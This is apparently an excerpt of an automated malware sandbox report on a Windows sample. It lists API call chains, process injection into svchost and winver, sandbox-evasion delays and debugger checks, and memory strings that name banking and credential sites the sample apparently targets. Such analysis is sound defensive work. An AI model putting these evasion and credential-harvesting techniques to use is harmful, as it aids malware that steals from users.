                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415D23 push 00000009h; retn 3081h2_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408695 push edx; retf 2_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004086AF push edx; retf 2_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003648D7
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003E5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003E5376
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00383187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00383187
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeAPI/Special instruction interceptor: Address: E7970C
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 9841Jump to behavior
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102344
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exe TID: 7940Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7940Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7940Thread sleep count: 9841 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7940Thread sleep time: -19682000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe TID: 5980Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C445A
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CC6D1 FindFirstFileW,FindClose,0_2_003CC6D1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CC75C
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CEF95
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CF0F2
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CF3F3
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C37EF
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C3B12
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CBCBC
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003649A0
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 341G64J42.5.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: 341G64J42.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 341G64J42.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 341G64J42.5.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 341G64J42.5.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 341G64J42.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 341G64J42.5.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: winver.exe, 00000005.00000002.2550854320.0000000003015000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000002.2555520009.000000000106F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2020800186.00000185E190D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 341G64J42.5.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 341G64J42.5.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 341G64J42.5.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 341G64J42.5.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 341G64J42.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 341G64J42.5.drBinary or memory string: global block list test formVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: 341G64J42.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 341G64J42.5.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 341G64J42.5.drBinary or memory string: discord.comVMware20,11696501413f
                Source: 341G64J42.5.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeAPI call chain: ExitProcess graph end nodegraph_0-100778
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeAPI call chain: ExitProcess graph end nodegraph_0-100880
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A83 LdrLoadDll,2_2_00417A83
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D3F09 BlockInput,0_2_003D3F09
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00363B3A
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00395A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00395A7C
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00364B37 LoadLibraryA,GetProcAddress,0_2_00364B37
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00E78338 mov eax, dword ptr fs:[00000030h]0_2_00E78338
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00E799D8 mov eax, dword ptr fs:[00000030h]0_2_00E799D8
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_00E79978 mov eax, dword ptr fs:[00000030h]0_2_00E79978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
